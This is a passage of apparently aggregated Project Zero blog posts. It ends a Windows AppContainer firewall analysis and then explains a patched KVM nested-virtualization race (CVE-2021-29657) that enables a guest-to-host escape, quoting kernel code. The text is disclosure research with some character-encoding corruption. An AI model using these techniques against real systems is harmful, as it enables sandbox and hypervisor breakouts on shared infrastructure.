PS> $cap = Get-NtSid -PackageSid "LOOPBACK" -AsCapability

PS> $token = Get-NtToken -LowBox -PackageSid "TEST" -cap $cap

PS> $sock = Invoke-NtToken $token {

    [System.Net.Sockets.TcpClient]::new("127.0.0.1", 445)

}

PS> $sock.Client.RemoteEndPoint

AddressFamily Address   Port

------------- -------   ----

 InterNetwork 127.0.0.1  445

Conclusions

That wraps up my quick overview of how AppContainer network restrictions are implemented using the Windows Firewall. I covered the basics of the Windows Firewall as well as covered some of my tooling I wrote to do analysis of the configuration. This background information allowed me to explain why the issue I reported to Microsoft worked. I also pointed out some of the quirks of the implementation which you might find of interest.

Having a good understanding of how a security feature works is an important step towards finding security issues. I hope that by providing both the background and tooling other researchers can also find similar issues and try and get them fixed.

‚úáGoogle Project Zero

An EPYC escape: Case-study of a KVM breakout

By: Ryan ‚ÄĒ

Posted by Felix Wilhelm, Project Zero

Introduction

KVM (for Kernel-based Virtual Machine) is the de-facto standard hypervisor for Linux-based cloud environments. Outside of Azure, almost all large-scale cloud and hosting providers are running on top of KVM, turning it into one of the fundamental security boundaries in the cloud.

In this blog post I describe a vulnerability in KVM’s AMD-specific code and discuss how this bug can be turned into a full virtual machine escape. To the best of my knowledge, this is the first public writeup of a KVM guest-to-host breakout that does not rely on bugs in user space components such as QEMU. The discussed bug was assigned CVE-2021-29657, affects kernel versions v5.10-rc1 to v5.12-rc6 and was patched at the end of March 2021. As the bug only became exploitable in v5.10 and was discovered roughly 5 months later, most real world deployments of KVM should not be affected. I still think the issue is an interesting case study in the work required to build a stable guest-to-host escape against KVM and hope that this writeup can strengthen the case that hypervisor compromises are not only theoretical issues.

I start with a short overview of KVM’s architecture, before diving into the bug and its exploitation.

KVM

KVM is a Linux based open source hypervisor supporting hardware accelerated virtualization on x86, ARM, PowerPC and S/390. In contrast to the other big open source hypervisor Xen, KVM is deeply integrated with the Linux Kernel and builds on its scheduling, memory management and hardware integrations to provide efficient virtualization.

KVM is implemented as one or more kernel modules (kvm.ko plus kvm-intel.ko or kvm-amd.ko on x86) that expose a low-level IOCTL-based API to user space processes over the /dev/kvm device. Using this API, a user space process (often called VMM for Virtual Machine Manager) can create new VMs, assign vCPUs and memory, and intercept memory or IO accesses to provide access to emulated or virtualization-aware hardware devices. QEMU has been the standard user space choice for KVM-based virtualization for a long time, but in the last few years alternatives like LKVM, crosvm or Firecracker have started to become popular.

While KVM’s reliance on a separate user space component might seem complicated at first, it has a very nice benefit: Each VM running on a KVM host has a 1:1 mapping to a Linux process, making it managable using standard Linux tools.

This means for example, that a guest's memory can be inspected by dumping the allocated memory of its user space process or that resource limits for CPU time and memory can be applied easily. Additionally, KVM can offload most work related to device emulation to the userspace component. Outside of a couple of performance-sensitive devices related to interrupt handling, all of the complex low-level code for providing virtual disk, network or GPU access can be implemented in userspace.  

When looking at public writeups of KVM-related vulnerabilities and exploits it becomes clear that this design was a wise decision. The large majority of disclosed vulnerabilities and all publicly available exploits affect QEMU and its support for emulated/paravirtualized devices.

Even though KVM’s kernel attack surface is significantly smaller than the one exposed by a default QEMU configuration or similar user space VMMs, a KVM vulnerability has advantages that make it very valuable for an attacker:

  • Whereas user space VMMs can be sandboxed to reduce the impact of a VM breakout, no such option is available for KVM itself. Once an attacker is able to achieve code execution (or similarly powerful primitives like write access to page tables) in the context of the host kernel, the system is fully compromised.
  • Due to the somewhat poor security history of QEMU, new user space VMMs like crosvm or Firecracker are written in Rust, a memory safe language. Of course, there can still be non-memory safety vulnerabilities or problems due to incorrect or buggy usage of the KVM APIs, but using Rust effectively prevents the large majority of bugs that were discovered in C-based user space VMMs in the past.
  • Finally, a pure KVM exploit can work against targets that use proprietary or heavily modified user space VMMs. While the big cloud providers do not go into much detail about their virtualization stacks publicly, it is safe to assume that they do not depend on an unmodified QEMU version for their production workloads. In contrast, KVM‚Äôs smaller code base makes heavy modifications unlikely (and KVM‚Äôs contributor list points at a strong tendency to upstream such modifications when they exist). ¬†

With these advantages in mind, I decided to spend some time hunting for a KVM vulnerability that could be turned into a guest-to-host escape. In the past, I had some success with finding vulnerabilities in KVM’s support for nested virtualization on Intel CPUs so reviewing the same functionality for AMD seemed like a good starting point. This is even more true, because the recent increase of AMD’s market share in the server segment means that KVM’s AMD implementation is suddenly becoming a more interesting target than it was in the last years.

Nested virtualization, the ability for a VM (called L1) to spawn nested guests (L2), was also a niche feature for a long time. However, due to hardware improvements that reduce its overhead and increasing customer demand it’s becoming more widely available. For example, Microsoft is heavily pushing for Virtualization-based Security as part of newer Windows versions, requiring nested virtualization to support cloud-hosted Windows installations. KVM enables support for nested virtualization on both AMD and Intel by default, so if an administrator or the user space VMM does not explicitly disable it, it’s part of the attack surface for a malicious or compromised VM.

AMD’s virtualization extension is called SVM (for Secure Virtual Machine) and in order to support nested virtualization, the host hypervisor needs to intercept all SVM instructions that are executed by its guests, emulate their behavior and keep its state in sync with the underlying hardware. As you might imagine, implementing this correctly is quite difficult with a large potential for complex logic flaws, making it a perfect target for manual code review.

The Bug

Before diving into the KVM codebase and the bug I discovered, I want to quickly introduce how AMD SVM works to make the rest of the post easier to understand. (For a thorough documentation see AMD64 Architecture Programmer‚Äôs Manual, Volume 2: System Programming Chapter 15.) SVM adds support for 6 new instructions to x86-64 if SVM support is enabled by setting the SVME bit in the EFER MSR. The most interesting of these instructions is VMRUN, which (as its name suggests) is responsible for running a guest VM. VMRUN takes an implicit parameter via the RAX register pointing to the page-aligned physical address of a data structure called ‚Äúvirtual machine control block‚ÄĚ (VMCB), which describes the state and configuration of the VM.

The VMCB is split into two parts: First, the State Save area, which stores the values of all guest registers, including segment and control registers. Second, the Control area which describes the configuration of the VM. The Control area describes the virtualization features enabled for a VM,  sets which VM actions are intercepted to trigger a VM exit and stores some fundamental configuration values such as the page table address used for nested paging.

If the VMCB is correctly prepared (and we are not already running in a VM), VMRUN will first save the host state in a memory region called the host save area, whose address is configured by writing a physical address to the VM_HSAVE_PA MSR. Once the host state is saved, the CPU switches to the VM context and VMRUN only returns once a VM exit is triggered for one reason or another.

An interesting aspect of SVM is that a lot of the state recovery after a VM exit has to be done by the hypervisor. Once a VM exit occurs, only RIP, RSP and RAX are restored to the previous host values and all other general purpose registers still contain the guest values. In addition, a full context switch requires manual execution of the VMSAVE/VMLOAD instructions which save/load additional system registers (FS, SS, LDTR, STAR, LSTAR …) from memory.

For nested virtualization to work, KVM intercepts execution of the VMRUN instruction and creates its own VMCB based on the VMCB the L1 guest prepared (called vmcb12 in KVM terminology). Of course, KVM can’t trust the guest provided vmcb12 and needs to carefully validate all fields that end up in the real VMCB that gets passed to the hardware (known as vmcb02).

Most of the KVM’s code for nested virtualization on AMD is implemented in arch/x86/kvm/svm/nested.c and the code that intercepts VMRUN instructions of nested guests is implemented in nested_svm_vmrun:

int nested_svm_vmrun(struct vcpu_svm *svm)

{

        int ret;

        struct vmcb *vmcb12;

        struct vmcb *hsave = svm->nested.hsave;

        struct vmcb *vmcb = svm->vmcb;

        struct kvm_host_map map;

        u64 vmcb12_gpa;

   

        vmcb12_gpa = svm->vmcb->save.rax; ** 1 ** 

        ret = kvm_vcpu_map(&svm->vcpu, gpa_to_gfn(vmcb12_gpa), &map); ** 2 **

        …

        ret = kvm_skip_emulated_instruction(&svm->vcpu);

        vmcb12 = map.hva;

        if (!nested_vmcb_checks(svm, vmcb12)) { ** 3 **

                vmcb12->control.exit_code    = SVM_EXIT_ERR;

                vmcb12->control.exit_code_hi = 0;

                vmcb12->control.exit_info_1  = 0;

                vmcb12->control.exit_info_2  = 0;

                goto out;

        }

        ...

        /*

         * Save the old vmcb, so we don't need to pick what we save, but can

         * restore everything when a VMEXIT occurs

         */

        hsave->save.es     = vmcb->save.es;

        hsave->save.cs     = vmcb->save.cs;

        hsave->save.ss     = vmcb->save.ss;

        hsave->save.ds     = vmcb->save.ds;

        hsave->save.gdtr   = vmcb->save.gdtr;

        hsave->save.idtr   = vmcb->save.idtr;

        hsave->save.efer   = svm->vcpu.arch.efer;

        hsave->save.cr0    = kvm_read_cr0(&svm->vcpu);

        hsave->save.cr4    = svm->vcpu.arch.cr4;

        hsave->save.rflags = kvm_get_rflags(&svm->vcpu);

        hsave->save.rip    = kvm_rip_read(&svm->vcpu);

        hsave->save.rsp    = vmcb->save.rsp;

        hsave->save.rax    = vmcb->save.rax;

        if (npt_enabled)

                hsave->save.cr3    = vmcb->save.cr3;

        else

                hsave->save.cr3    = kvm_read_cr3(&svm->vcpu);

        copy_vmcb_control_area(&hsave->control, &vmcb->control);

        svm->nested.nested_run_pending = 1;

        if (enter_svm_guest_mode(svm, vmcb12_gpa, vmcb12)) ** 4 **

                goto out_exit_err;

        if (nested_svm_vmrun_msrpm(svm))

                goto out;

out_exit_err:

        svm->nested.nested_run_pending = 0;

        svm->vmcb->control.exit_code    = SVM_EXIT_ERR;

        svm->vmcb->control.exit_code_hi = 0;

        svm->vmcb->control.exit_info_1  = 0;

        svm->vmcb->control.exit_info_2  = 0;

        nested_svm_vmexit(svm);

out:

        kvm_vcpu_unmap(&svm->vcpu, &map, true);

        return ret;

}

The function first fetches the value of RAX out of the currently active vmcb (svm->vcmb) in 1 (numbers are marked in the code samples). For guests using nested paging (which is the only relevant configuration nowadays) RAX contains a guest physical address (GPA), which needs to be translated into a host physical address (HPA) first. kvm_vcpu_map (2) takes care of this translation and maps the underlying page to a host virtual address (HVA) that can be directly accessed by KVM.

Once the VMCB is mapped, nested_vmcb_checks is called for some basic validation in 3. Afterwards, the L1 guest context which is stored in svm->vmcb is copied into the host save area svm->nested.hsave before KVM enters the nested guest context by calling enter_svm_guest_mode (4).

int enter_svm_guest_mode(struct vcpu_svm *svm, u64 vmcb12_gpa,

                         struct vmcb *vmcb12)

{

        int ret;

        svm->nested.vmcb12_gpa = vmcb12_gpa;

        load_nested_vmcb_control(svm, &vmcb12->control);

        nested_prepare_vmcb_save(svm, vmcb12);

        nested_prepare_vmcb_control(svm);

        ret = nested_svm_load_cr3(&svm->vcpu, vmcb12->save.cr3,

                                  nested_npt_enabled(svm));

        if (ret)

                return ret;

        svm_set_gif(svm, true);

        return 0;

}

static void load_nested_vmcb_control(struct vcpu_svm *svm,

                                     struct vmcb_control_area *control)

{

        copy_vmcb_control_area(&svm->nested.ctl, control);

        ...

}

Looking at enter_svm_guest_mode we can see that KVM copies the vmcb12 control area directly into svm->nested.ctl and does not perform any further checks on the copied value.

Readers familiar with double fetch or Time-of-Check-to-Time-of-Use vulnerabilities might already see a potential issue here: The call to nested_vmcb_checks at the beginning of nested_svm_vmrun performs all of its checks on a copy of the VMCB that is stored in guest memory. This means that a guest with multiple CPU cores can modify fields in the VMCB after they are verified in nested_vmcb_checks, but before they are copied to svm->nested.ctl in load_nested_vmcb_control.

Let’s look at nested_vmcb_checks to see what kind of checks we can bypass with this approach:

static bool nested_vmcb_check_controls(struct vmcb_control_area *control)

{

        if ((vmcb_is_intercept(control, INTERCEPT_VMRUN)) == 0)

                return false;

        if (control->asid == 0)

                return false;

        if ((control->nested_ctl & SVM_NESTED_CTL_NP_ENABLE) &&

            !npt_enabled)

                return false;

        return true;

}

At first glance this looks pretty harmless. control->asid isn’t used anywhere and the last check is only relevant for systems where nested paging isn’t supported. However, the first check turns out to be very interesting.

For reasons unknown to me, SVM VMCBs contain a bit that enables or disables interception of the VMRUN instruction when executed inside a guest. Clearing this bit isn’t actually supported by hardware and results in an immediate VMEXIT, so the check in nested_vmcb_check_controls simply replicates this behavior.  When we race and bypass the check by repeatedly flipping the value of the INTERCEPT_VMRUN bit, we can end up in a situation where svm->nested.ctl contains a 0 in place of the INTERCEPT_VMRUN bit. To understand the impact we first need to see how nested vmexit’s are handled in KVM:

The main SVM exit handler is the function handle_exit in arch/x86/kvm/svm.c, which is called whenever a VMexit occurs. When KVM is running a nested guest, it first has to check if the exit should be handled by itself or the L1 hypervisor. To do this it calls the function nested_svm_exit_handled (5) which will return NESTED_EXIT_DONE if the vmexit will be handled by the L1 hypervisor and no further processing by the L0 hypervisor is needed:

 static int handle_exit(struct kvm_vcpu *vcpu, fastpath_t exit_fastpath)

{

        struct vcpu_svm *svm = to_svm(vcpu);

        struct kvm_run *kvm_run = vcpu->run;

        u32 exit_code = svm->vmcb->control.exit_code;

        … 

        if (is_guest_mode(vcpu)) {

                int vmexit;

                trace_kvm_nested_vmexit(exit_code, vcpu, KVM_ISA_SVM);

                vmexit = nested_svm_exit_special(svm);

                if (vmexit == NESTED_EXIT_CONTINUE)

                        vmexit = nested_svm_exit_handled(svm); ** 5 **

                if (vmexit == NESTED_EXIT_DONE)

                        return 1;

        }

}

static int nested_svm_intercept(struct vcpu_svm *svm)

{

        // exit_code==INTERCEPT_VMRUN when the L2 guest executes vmrun

        u32 exit_code = svm->vmcb->control.exit_code;

        int vmexit = NESTED_EXIT_HOST;

        switch (exit_code) {

        case SVM_EXIT_MSR:

                vmexit = nested_svm_exit_handled_msr(svm);

                break;

        case SVM_EXIT_IOIO:

                vmexit = nested_svm_intercept_ioio(svm);

                break;

        … 

        default: {

                if (vmcb_is_intercept(&svm->nested.ctl, exit_code)) ** 7 **

                        vmexit = NESTED_EXIT_DONE;

        }

        }

        return vmexit;

}

int nested_svm_exit_handled(struct vcpu_svm *svm)

{

        int vmexit;

        vmexit = nested_svm_intercept(svm); ** 6 ** 

        if (vmexit == NESTED_EXIT_DONE)

                nested_svm_vmexit(svm); ** 8 **

        return vmexit;

}

nested_svm_exit_handled first calls nested_svm_intercept (6) to see if the exit should be handled. When we trigger an exit by executing VMRUN in a L2 guest, the default case is executed (7) to see if the INTERCEPT_VMRUN bit in svm->nested.ctl is set. Normally, this should always be the case and the function returns NESTED_EXIT_DONE to trigger a nested VM exit from L2 to L1 and to let the L1 hypervisor handle the exit (8). (This way KVM supports infinite nesting of hypervisors).

However, if the L1 guest exploited the race condition described above svm->nested.ctl won’t have the INTERCEPT_VMRUN bit set and the VM exit will be handled by KVM itself. This results in a second call to nested_svm_vmrun while still running inside the L2 gue